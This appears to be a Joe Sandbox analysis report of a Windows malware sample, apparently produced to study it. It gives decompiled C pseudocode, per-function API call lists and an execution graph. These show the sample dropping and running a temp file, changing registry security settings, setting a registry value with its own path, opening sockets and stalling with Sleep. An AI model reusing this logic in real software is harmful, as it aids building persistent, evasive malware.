    					E003C2150(_t86, _t75);
    					_t61 =  *0x3e8628; // 0x622508
    					_t70 =  *((intOrPtr*)(_t61 + 0xac));
    					_v16 = 1;
    					 *_t70(0x3e8594);
    					E003CCB70(_t53, _t53, _t72);
    					L003C1CB0();
    					 *_t72 = _t75;
    					_t47 =  *0x3e8628; // 0x622508
    					_t79 = _t79 + 0x10;
    					 *((intOrPtr*)( *((intOrPtr*)(_t47 + 0xc4))))(0x3e8594, _t53);
    					_t49 =  *_t72;
    					if(_t49 == 0) {
    						goto L13;
    					}
    					_t77 = 0;
    					if( *((intOrPtr*)(_t49 + 0x18)) <= 0) {
    						goto L13;
    					}
    					_t55 = __imp___time64;
    					do {
    						_t50 =  *_t55(0);
    						_t65 =  *((intOrPtr*)( *_t72 + 0x28));
    						 *((intOrPtr*)(_t65 + _t77 * 8)) = _t50;
    						 *((intOrPtr*)(_t65 + 4 + _t77 * 8)) = _t70;
    						_t70 =  *_t72;
    						_t77 = _t77 + 1;
    						_t79 = _t79 + 4;
    					} while (_t77 <  *((intOrPtr*)(_t70 + 0x18)));
    				}
    			}

    APIs
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • ??2@YAPAXI@Z.MSVCRT ref: 003C2024
    • ??3@YAXPAX@Z.MSVCRT ref: 003C20A1
    • _time64.MSVCRT ref: 003C20D2
      • Part of subcall function 003CCB70: SysFreeString.OLEAUT32(?), ref: 003CCB81
    • ??3@YAXPAX@Z.MSVCRT ref: 003C20F9
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 20%
    			E003CD890(void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v8;
    				char _v12;
    				char _v212;
    				void* _t21;
    				void* _t26;
    				intOrPtr* _t31;
    				intOrPtr _t41;
    				void* _t42;
    				intOrPtr _t43;
    				intOrPtr _t44;
    				intOrPtr _t46;
    				void* _t48;
    				void* _t49;
    
    				_v8 = 0;
    				_v12 = 0;
    				_t42 = 1;
    				E003C9090(__eflags,  &_v212, 0xd);
    				_push( &_v12);
    				_push( &_v8);
    				_push( &_v212);
    				_push(5);
    				_push(_a8);
    				_t21 = E003C5A10();
    				_t49 = _t48 + 0x1c;
    				if(_t21 == 0) {
    					L11:
    					_t22 = _v8;
    					if(_v8 != 0) {
    						E003CBB40(_t22);
    					}
    					return _t42;
    				}
    				if(_v8 == 0 || _v12 == 0) {
    					_t42 = 2;
    					goto L11;
    				} else {
    					_push(0x14);
    					L003CA47E();
    					_t49 = _t49 + 4;
    					if(_t21 == 0) {
    						_t46 = 0;
    						__eflags = 0;
    					} else {
    						_t46 = E003CB1C0(_t21);
    					}
    					_t41 = _v12;
    					_t26 = E003C9020(_t46, _a4, _v8, _t41);
    					if(_t26 != 0) {
    						__imp___time64(0);
    						_t43 =  *((intOrPtr*)(_t46 + 0x10));
    						_t49 = _t49 + 4;
    						__eflags = 0 - _t41;
    						if(__eflags > 0) {
    							L18:
    							_t31 = _a12;
    							_t44 =  *_t31;
    							__eflags = _t44;
    							if(_t44 != 0) {
    								E003C2DE0(_t44);
    								_push(_t44);
    								L003C1CB0();
    								_t49 = _t49 + 4;
    							}
    							 *_t31 = _t46;
    							_t42 = 0;
    							goto L10;
    						}
    						if(__eflags < 0) {
    							L17:
    							_t42 = 4;
    							goto L8;
    						}
    						__eflags = _t43 - _t26;
    						if(_t43 >= _t26) {
    							goto L18;
    						}
    						goto L17;
    					} else {
    						_t14 = _t26 + 3; // 0x3
    						_t42 = _t14;
    						L8:
    						if(_t46 != 0) {
    							E003C2DE0(_t46);
    							_push(_t46);
    							L003C1CB0();
    							_t49 = _t49 + 4;
    						}
    						L10:
    						goto L11;
    					}
    				}
    			}

    APIs
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • ??2@YAPAXI@Z.MSVCRT ref: 003CD8EA
    • ??3@YAXPAX@Z.MSVCRT ref: 003CD929
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • _time64.MSVCRT ref: 003CD94B
    • ??3@YAXPAX@Z.MSVCRT ref: 003CD97B
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 69%
    			E003D0B00(void* __ecx, char __edx, void* __eflags, intOrPtr _a4) {
    				char _v8;
    				char _v16;
    				char _v20;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t14;
    				void* _t16;
    				void* _t18;
    				void* _t21;
    				char _t34;
    				char* _t36;
    				void* _t37;
    				void* _t39;
    				void* _t40;
    				void* _t41;
    				void* _t42;
    				void* _t44;
    				void* _t48;
    
    				_t34 = __edx;
    				_t26 = _a4;
    				_t37 = __ecx;
    				_v20 = 0;
    				_v16 = 0;
    				_t14 = E003CC7B0(0, __eflags, _a4);
    				_a4 = _t14;
    				if(_t14 == 0) {
    					L10:
    					return 0;
    				}
    				_t16 = E003CED90(_t14, 0, 0,  &_v20);
    				_t42 = _t41 + 0x10;
    				if(_t16 == 0) {
    					L9:
    					E003CBB40(_a4);
    					goto L10;
    				}
    				__imp___time64(0);
    				_t42 = _t42 + 4;
    				_t18 = _t16 - _v20;
    				_t48 = _t18;
    				asm("sbb edx, [ebp-0xc]");
    				_v8 = _t34;
    				if(_t48 < 0) {
    					goto L9;
    				}
    				if(_t48 > 0) {
    					L5:
    					_t39 = E003C1BE0(_t37, _t49, _t26);
    					_t50 = _t39;
    					if(_t39 != 0) {
    						E003C7A20(_t26, _t39, _t37);
    						_push(_t39);
    						L003C1CB0();
    						_t44 = _t42 + 4;
    						_t36 =  &_v8;
    						_t21 = E003CEE40(_t37, _t36, _t50, _t26, _t36);
    						_t40 = _t21;
    						if(_t40 != 0) {
    							E003C7A20(_t26, _t40, _t37);
    							_push(_t40);
    							L003C1CB0();
    							_t42 = _t44 + 4;
    						} else {
    							__imp___time64(_t21);
    							_v20 = _t21 - 0x3ed78;
    							asm("sbb edx, esi");
    							_v16 = _t36;
    							E003CCAA0(_a4, _t40, _t40,  &_v20);
    							_t42 = _t44 + 0x14;
    						}
    					}
    					goto L9;
    				}
    				_t49 = _t18 - 0x3f480;
    				if(_t18 <= 0x3f480) {
    					goto L9;
    				}
    				goto L5;
    			}

    APIs
      • Part of subcall function 003CC7B0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000), ref: 003CC828
    • _time64.MSVCRT ref: 003D0B3F
      • Part of subcall function 003C1BE0: ??2@YAPAXI@Z.MSVCRT ref: 003C1C02
      • Part of subcall function 003C1BE0: ??3@YAXPAX@Z.MSVCRT ref: 003C1C4A
      • Part of subcall function 003C7A20: SysFreeString.OLEAUT32(?), ref: 003C7A3C
    • ??3@YAXPAX@Z.MSVCRT ref: 003D0B72
      • Part of subcall function 003CEE40: ??2@YAPAXI@Z.MSVCRT ref: 003CEF57
      • Part of subcall function 003CEE40: ??3@YAXPAX@Z.MSVCRT ref: 003CEF96
      • Part of subcall function 003CEE40: ??3@YAXPAX@Z.MSVCRT ref: 003CF02B
    • _time64.MSVCRT ref: 003D0B8D
    • ??3@YAXPAX@Z.MSVCRT ref: 003D0BBC
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
      • Part of subcall function 003C5A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,003CFE81), ref: 003C5ABF
    • ??2@YAPAXI@Z.MSVCRT ref: 003D1BAF
    • ??3@YAXPAX@Z.MSVCRT ref: 003D1BEE
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • _time64.MSVCRT ref: 003D1C10
    • ??3@YAXPAX@Z.MSVCRT ref: 003D1C3D
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 100%
    			E003E2614() {
    				intOrPtr _t10;
    				intOrPtr* _t11;
    				signed int _t12;
    				intOrPtr* _t15;
    				intOrPtr* _t16;
    				void* _t17;
    				intOrPtr _t22;
    				intOrPtr _t23;
    				signed int _t25;
    				signed int _t26;
    				void* _t28;
    
    				_t28 =  *0x3c0000 - 0x5a4d; // 0x5a4d
    				if(_t28 == 0) {
    					_t10 =  *0x3c003c; // 0x108
    					_t1 = _t10 + 0x3c0000; // 0x4550
    					_t11 = _t1;
    					__eflags =  *_t11 - 0x4550;
    					if( *_t11 != 0x4550) {
    						goto L1;
    					} else {
    						_t25 =  *(_t11 + 0x18) & 0x0000ffff;
    						__eflags = _t25 - 0x10b;
    						if(_t25 == 0x10b) {
    							__eflags =  *((intOrPtr*)(_t11 + 0x74)) - 0xe;
    							if( *((intOrPtr*)(_t11 + 0x74)) <= 0xe) {
    								goto L1;
    							} else {
    								_t26 = 0;
    								__eflags =  *(_t11 + 0xe8);
    								goto L9;
    							}
    						} else {
    							__eflags = _t25 - 0x20b;
    							if(_t25 != 0x20b) {
    								goto L1;
    							} else {
    								__eflags =  *((intOrPtr*)(_t11 + 0x84)) - 0xe;
    								if( *((intOrPtr*)(_t11 + 0x84)) <= 0xe) {
    									goto L1;
    								} else {
    									_t26 = 0;
    									__eflags =  *(_t11 + 0xf8);
    									L9:
    									_t8 = __eflags != 0;
    									__eflags = _t8;
    									_t12 = _t26 & 0xffffff00 | _t8;
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					_t12 = 0;
    				}
    				 *0x3e864c = _t12;
    				__set_app_type(E003C984A(2));
    				 *0x3e8c30 =  *0x3e8c30 | 0xffffffff;
    				 *0x3e8c34 =  *0x3e8c34 | 0xffffffff;
    				_t15 = __p__fmode();
    				_t22 =  *0x3e8988; // 0x0
    				 *_t15 = _t22;
    				_t16 = __p__commode();
    				_t23 =  *0x3e8984; // 0x0
    				 *_t16 = _t23;
    				_t17 = E003C7D3B();
    				if( *0x3e8128 == 0) {
    					__setusermatherr(E003C7D3B);
    				}
    				E003C1421(_t17);
    				return 0;
    			}

    APIs
      • Part of subcall function 003C984A: GetModuleHandleA.KERNEL32(00000000), ref: 003C9851
    • __set_app_type.MSVCRT ref: 003E2680
    • __p__fmode.MSVCRT ref: 003E2696
    • __p__commode.MSVCRT ref: 003E26A4
    • __setusermatherr.MSVCRT ref: 003E26C5
      • Part of subcall function 003C1421: _controlfp.MSVCRT ref: 003C142B
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    APIs
    • socket.WS2_32(00000002,00000001,00000000), ref: 003DEB2B
    • connect.WS2_32(00000000,?,00000010), ref: 003DEB4F
    • closesocket.WS2_32(00000000), ref: 003DEB5A
    • setsockopt.WS2_32(00000000,0000FFFF,00001006,?,00000004), ref: 003DEB7C
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 54%
    			E003C7CF0(intOrPtr* __ecx) {
    				void* _t3;
    				long _t5;
    				intOrPtr _t6;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				void* _t10;
    
    				_t8 = __ecx;
    				_t9 =  *__ecx;
    				if(_t9 != 0) {
    					_t5 = InterlockedDecrement(_t9 + 8);
    					if(_t5 == 0 && _t9 != 0) {
    						_t6 =  *_t9;
    						if(_t6 != 0) {
    							__imp__#6(_t6);
    						}
    						_t5 =  *(_t9 + 4);
    						if(_t5 != 0) {
    							_push(_t5);
    							L003CCB64();
    							_t10 = _t10 + 4;
    						}
    						_push(_t9);
    						L003C1CB0();
    					}
    					 *_t8 = 0;
    					return _t5;
    				}
    				return _t3;
    			}

    APIs
    • InterlockedDecrement.KERNEL32(?), ref: 003C7CFE
    • SysFreeString.OLEAUT32(00000000), ref: 003C7D13
    • ??_V@YAXPAX@Z.MSVCRT ref: 003C7D21
    • ??3@YAXPAX@Z.MSVCRT ref: 003C7D2A
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 33%
    			E003DED7D(void* __eax, int __ecx, signed int __edx, void* _a4, void* _a8, void* _a12, int _a16, intOrPtr _a20, signed int _a24) {
    				void* _v8;
    				signed int _v12;
    				void* _v16;
    				intOrPtr _v20;
    				int _v24;
    				signed int _v28;
    				void* _v32;
    				void _v52;
    				void _v72;
    				signed int _t82;
    				void* _t85;
    				int _t86;
    				signed int _t98;
    				signed int _t104;
    				signed int _t105;
    				signed int* _t110;
    				void* _t122;
    				int _t123;
    				int _t124;
    				intOrPtr _t128;
    				signed int _t135;
    				signed int _t136;
    				void* _t142;
    				signed int _t144;
    				signed int _t146;
    				signed int _t152;
    				signed int _t155;
    				void* _t156;
    				void* _t157;
    				void* _t167;
    				int _t169;
    				void* _t172;
    				void* _t177;
    				void* _t181;
    				void* _t183;
    				void* _t189;
    
    				_t152 = __edx;
    				asm("cdq");
    				_t82 = __eax - __edx >> 1;
    				_v12 = _t82;
    				_t123 = __ecx;
    				_v16 = _t82 + _a4;
    				_t157 =  *0x3e8538(0x200, _t156, _t167, _t122);
    				_v32 = _t157;
    				_t85 =  *0x3e8538(0x200);
    				_v8 = _t85;
    				_t86 =  *0x3e8538(0x200);
    				_v24 = _t86;
    				_v20 =  *0x3e8538(0x200);
    				memcpy(_t157, _a8, __ecx);
    				_t169 = _a16;
    				memcpy(_t157 + _t123, _a12, _t169);
    				_t124 = _t123 + _t169;
    				E003DEB87(_a4, _v12, _t157, _t124,  &_v52);
    				memcpy(_v8 + 0x10, _t157, _t124);
    				asm("cdq");
    				_t181 = _t177 + 0x38;
    				_t98 = _a24 + (_t152 & 0x0000000f) >> 4;
    				_t135 = _a24 & 0x8000000f;
    				if(_t135 < 0) {
    					_t189 = (_t135 - 0x00000001 | 0xfffffff0) + 1;
    				}
    				if(_t189 != 0) {
    					_t98 = _t98 + 1;
    				}
    				if(_t98 > 0) {
    					_a16 = _v24;
    					_v28 = _t98;
    					do {
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						E003DEB87(_a4, _v12, _v8, _t124 + 0x10, _a16);
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						asm("movsd");
    						E003DEB87(_a4, _v12,  &_v72, 0x10,  &_v52);
    						_a16 = _a16 + 0x10;
    						_t181 = _t181 + 0x28;
    						_t36 =  &_v28;
    						 *_t36 = _v28 - 1;
    					} while ( *_t36 != 0);
    					_t157 = _v32;
    				}
    				E003DEC77(_v16, _v12, _t157, _t124,  &_v52);
    				memcpy(_v8 + 0x14, _t157, _t124);
    				_t104 = _a24;
    				_t183 = _t181 + 0x20;
    				asm("cdq");
    				_t136 = 0x14;
    				_t105 = _t104 / _t136;
    				if(_t104 % _t136 != 0) {
    					_t105 = _t105 + 1;
    				}
    				if(_t105 > 0) {
    					_t128 = _t124 + 0x14;
    					_a4 = _v20;
    					_a16 = _t105;
    					do {
    						_t144 = 5;
    						memcpy(_v8,  &_v52, _t144 << 2);
    						E003DEC77(_v16, _v12, _v8, _t128, _a4);
    						_t146 = 5;
    						memcpy( &_v72,  &_v52, _t146 << 2);
    						E003DEC77(_v16, _v12,  &_v72, 0x14,  &_v52);
    						_a4 = _a4 + 0x14;
    						_t183 = _t183 + 0x40;
    						_t67 =  &_a16;
    						 *_t67 = _a16 - 1;
    					} while ( *_t67 != 0);
    					_t157 = _v32;
    				}
    				if(_a24 > 0) {
    					_t110 = _v24;
    					_t155 = _a24;
    					_t142 = _v20 - _t110;
    					_t172 = _a20 - _t110;
    					do {
    						 *(_t172 + _t110) =  *(_t142 + _t110) ^  *_t110;
    						_t110 =  &(_t110[0]);
    						_t155 = _t155 - 1;
    					} while (_t155 != 0);
    				}
    				 *0x3e8540(_v20);
    				 *0x3e8540(_v24);
    				 *0x3e8540(_v8);
    				return  *0x3e8540(_t157);
    			}

    APIs
    • memcpy.MSVCRT ref: 003DEDCE
    • memcpy.MSVCRT ref: 003DEDE1
      • Part of subcall function 003DEB87: memset.MSVCRT ref: 003DEB9D
      • Part of subcall function 003DEB87: memset.MSVCRT ref: 003DEBAD
      • Part of subcall function 003DEB87: memcpy.MSVCRT ref: 003DEBBF
      • Part of subcall function 003DEB87: memcpy.MSVCRT ref: 003DEBD1
    • memcpy.MSVCRT ref: 003DEE08
      • Part of subcall function 003DEC77: memset.MSVCRT ref: 003DEC88
      • Part of subcall function 003DEC77: memset.MSVCRT ref: 003DEC98
      • Part of subcall function 003DEC77: memcpy.MSVCRT ref: 003DECA7
      • Part of subcall function 003DEC77: memcpy.MSVCRT ref: 003DECB9
    • memcpy.MSVCRT ref: 003DEEA9
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 93%
    			E003C1B20(intOrPtr __ecx, void* __edx, void* __eflags) {
    				intOrPtr _t23;
    				intOrPtr _t24;
    				intOrPtr _t25;
    				void* _t29;
    				void* _t37;
    				intOrPtr _t39;
    				void* _t43;
    
    				_t43 = __eflags;
    				_t37 = __edx;
    				_t39 = __ecx;
    				E003C2750(__ecx + 0x4f4);
    				E003C5000(__ecx + 0x4fc);
    				 *((intOrPtr*)(__ecx + 0x18)) = 0;
    				 *((intOrPtr*)(__ecx + 0x14)) = 0;
    				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
    				 *((intOrPtr*)(__ecx + 0x20)) = 0;
    				 *((intOrPtr*)(__ecx + 0x28)) = 0;
    				memset(__ecx + 0x30, 0, 0x2c);
    				_t29 = _t39 + 0x5c;
    				memset(_t29, 0, 0x498);
    				 *((intOrPtr*)(_t39 + 0x24)) = E003C4A10(_t43);
    				_t23 = E003CF0A0();
    				_push(0x10);
    				 *((intOrPtr*)(_t39 + 0x1c)) = _t23;
    				L003CA47E();
    				_t44 = _t23;
    				if(_t23 == 0) {
    					_t24 = 0;
    					__eflags = 0;
    				} else {
    					_t24 = E003C2DF0(_t23, _t44);
    				}
    				 *((intOrPtr*)(_t39 + 4)) = _t24;
    				_push(0x10);
    				 *((intOrPtr*)(_t24 + 8)) = _t39;
    				L003CA47E();
    				if(_t24 == 0) {
    					_t25 = 0;
    					__eflags = 0;
    				} else {
    					_t25 = E003CCBF0(_t24, 0xc);
    				}
    				 *((intOrPtr*)(_t39 + 0xc)) = _t25;
    				 *_t29 = 0;
    				 *((intOrPtr*)(_t39 + 0x60)) = 0;
    				 *((intOrPtr*)(_t39 + 0x4ec)) = 1;
    				E003D14A0(_t39);
    				E003CCE00(_t39, _t37);
    				return _t39;
    			}

    APIs
    • memset.MSVCRT ref: 003C1B53
    • memset.MSVCRT ref: 003C1B62
      • Part of subcall function 003C4A10: GetProcAddress.KERNEL32(00000000), ref: 003C4A74
    • ??2@YAPAXI@Z.MSVCRT ref: 003C1B79
    • ??2@YAPAXI@Z.MSVCRT ref: 003C1B98
      • Part of subcall function 003D14A0: wsprintfW.USER32 ref: 003D1639
      • Part of subcall function 003D14A0: rand.MSVCRT ref: 003D1690
      • Part of subcall function 003CCE00: _time64.MSVCRT ref: 003CCE12
      • Part of subcall function 003CCE00: _time64.MSVCRT ref: 003CCE59
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd

    Execution Graph

    Execution Coverage:18.4%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:5.4%
    Total number of Nodes:2000
    Total number of Limit Nodes:76

    Graph

391a80 2 API calls 14226->14227 14228 3b097d 14227->14228 14229 39bb40 HeapFree 14228->14229 14230 3b0989 14229->14230 14230->14210 16788 39fd15 16805 39e7d0 16788->16805 16790 39fd25 16791 39fd2d ??2@YAPAXI 16790->16791 16792 39fd40 16791->16792 16808 39e850 16792->16808 16794 39fd47 16812 393d50 16794->16812 16796 3a04e6 16799 3a04f5 ExitProcess 16796->16799 16797 39fd54 16797->16796 16798 398030 10 API calls 16797->16798 16800 3a042e 16798->16800 16801 3a1d90 10 API calls 16800->16801 16802 3a0439 16801->16802 16804 39bb40 HeapFree 16802->16804 16804->16796 16855 3b0790 memset 16805->16855 16809 39e868 16808->16809 16810 39e88c CoCreateInstance 16809->16810 16811 39e86c 16809->16811 16810->16794 16811->16794 16813 393d56 16812->16813 16815 3962c2 16813->16815 16816 398030 10 API calls 16813->16816 16814 3965d9 16814->16797 16815->16814 16817 39bb40 HeapFree 16815->16817 16818 39629e 16816->16818 16817->16814 16912 3932c0 16818->16912 16821 3962c7 16923 395bd0 16821->16923 16822 3962b7 16979 3b0580 16822->16979 16825 3962d2 16825->16815 16826 399090 2 API calls 16825->16826 16827 3962eb 16826->16827 16828 399090 2 API calls 16827->16828 16829 3962f9 VariantInit VariantInit 16828->16829 16966 3b0290 SysAllocString 16829->16966 16831 39634a 16968 3913c0 ??2@YAPAXI 16831->16968 16833 39636d 16856 399090 2 API calls 16855->16856 16857 3b07be 16856->16857 16870 3b0640 16857->16870 16860 399090 2 API calls 16861 3b07e7 StrStrW 16860->16861 16880 39f630 16861->16880 16863 3b0806 16864 3b0640 9 API calls 16863->16864 16865 3b080d memset 16864->16865 16866 399090 2 API calls 16865->16866 16867 3b0829 16866->16867 16868 3b0640 9 API calls 16867->16868 16869 39e7e0 16868->16869 16869->16790 16871 3b065c StrChrW RegOpenKeyExW 16870->16871 16872 3b0657 16870->16872 16873 3b0692 GetSecurityInfo 16871->16873 16879 3b073a memset 16871->16879 16872->16871 16874 3b06b9 16873->16874 16873->16879 16895 3980a0 16874->16895 16876 3b06c4 StrChrW RegOpenKeyExW 16877 3b0718 
SetNamedSecurityInfoW 16876->16877 16878 3b06f7 RegSetValueExW 16876->16878 16877->16879 16878->16877 16879->16860 16881 39f63a 16880->16881 16882 39f63e 16880->16882 16881->16863 16883 3a1d90 10 API calls 16882->16883 16884 39f65a memset memcpy 16883->16884 16889 39f68a 16884->16889 16885 39bb40 HeapFree 16887 39f707 16885->16887 16887->16863 16890 39f6e2 16889->16890 16894 39f6fc 16889->16894 16901 39cea0 16889->16901 16909 3997e0 16889->16909 16891 39cea0 4 API calls 16890->16891 16892 39f6ec 16891->16892 16893 3997e0 4 API calls 16892->16893 16892->16894 16893->16894 16894->16885 16896 3980e9 16895->16896 16897 398121 memset 16896->16897 16899 3981b1 16896->16899 16898 39817e 16897->16898 16898->16899 16900 398188 SetSecurityInfo 16898->16900 16899->16876 16900->16899 16902 39ceab 16901->16902 16903 39ceb0 16901->16903 16902->16889 16904 39cebc lstrlenW 16903->16904 16905 39cf41 16903->16905 16904->16905 16906 39cec7 RegOpenKeyExW RegOpenKeyExW 16904->16906 16905->16889 16907 39cf03 RegOpenKeyExW 16906->16907 16908 39cf22 16906->16908 16907->16908 16908->16889 16910 39cea0 4 API calls 16909->16910 16911 3997fa 16910->16911 16911->16889 16916 3932e5 16912->16916 16913 39334c VariantClear 16913->16916 16914 393378 SysFreeString 16914->16916 16915 3932e9 16915->16821 16915->16822 16916->16913 16916->16914 16916->16915 16918 393412 16916->16918 16919 3933f2 SysFreeString 16916->16919 16921 399090 2 API calls 16916->16921 16917 39348f VariantClear 16917->16918 16918->16915 16918->16917 16920 3934b7 SysFreeString 16918->16920 16919->16916 16922 3932c0 2 API calls 16920->16922 16921->16916 16922->16918 16924 395c07 16923->16924 16925 395c42 LookupAccountSidW 16924->16925 16965 395eed 16924->16965 16927 395c61 16925->16927 16928 395cd5 16925->16928 16926 39bb40 HeapFree 16930 395eff 16926->16930 16927->16825 16929 395d37 16928->16929 16931 3a1d90 10 API calls 16928->16931 16933 391c70 10 API calls 16929->16933 16930->16825 16932 395cf0 memcpy memcpy 16931->16932 
16932->16929 16934 395d47 16933->16934 16935 3a1d90 10 API calls 16934->16935 16936 395d58 16935->16936 16937 399090 2 API calls 16936->16937 16938 395d65 16937->16938 16939 399090 2 API calls 16938->16939 16940 395d73 16939->16940 16941 395dac 16940->16941 16942 399090 2 API calls 16940->16942 16943 399090 2 API calls 16941->16943 16945 395d83 16942->16945 16965->16926 16965->16930 16967 3b02b0 16966->16967 16967->16831 16969 3913f6 16968->16969 16970 3913d7 SysAllocString 16968->16970 16969->16833 16970->16969 16980 3b05a7 16979->16980 16989 3b0320 RegOpenKeyW 16980->16989 16982 3b0634 16982->16815 16983 3b05c1 16983->16982 16992 3b04a0 memset GetTempPathA 16983->16992 16985 3b05f1 GetModuleFileNameW 16998 3b0380 RegCreateKeyExW RegSetValueExW RegCloseKey 16985->16998 16987 3b0624 16988 3b04a0 11 API calls 16987->16988 16988->16982 16990 3b0341 RegQueryValueExW RegCloseKey 16989->16990 16991 3b0369 16989->16991 16990->16991 16991->16983 16993 3b04f0 16992->16993 16999 3b03d0 CreateFileA WriteFile CloseHandle 16993->16999 16995 3b0531 17000 3b0420 memset CreateProcessA 16995->17000 16998->16987 16999->16995 17001 3b0499 DeleteFileA 17000->17001 17002 3b0474 WaitForSingleObject CloseHandle CloseHandle 17000->17002 17001->16985 17002->17001 14584 3b2403 GetEnvironmentStringsW 14585 395700 14586 399090 2 API calls 14585->14586 14587 395721 14586->14587 14602 392450 14587->14602 14589 395731 14590 3957c5 14589->14590 14591 395750 ??2@YAPAXI 14589->14591 14597 3957f3 14589->14597 14598 397a20 19 API calls 14589->14598 14618 39b110 14589->14618 14621 393630 14589->14621 14630 39c960 14589->14630 14641 39d6e0 14589->14641 14592 3957e9 14590->14592 14593 39bb40 HeapFree 14590->14593 14590->14597 14591->14589 14594 39bb40 HeapFree 14592->14594 14593->14590 14594->14597 14600 3957ae ??3@YAXPAX 14598->14600 14600->14589 14606 39247f 14602->14606 14603 3924b2 14604 39bb40 HeapFree 14603->14604 14605 39261f 14604->14605 14605->14589 14606->14603 14607 3924e4 FindFirstFileW 
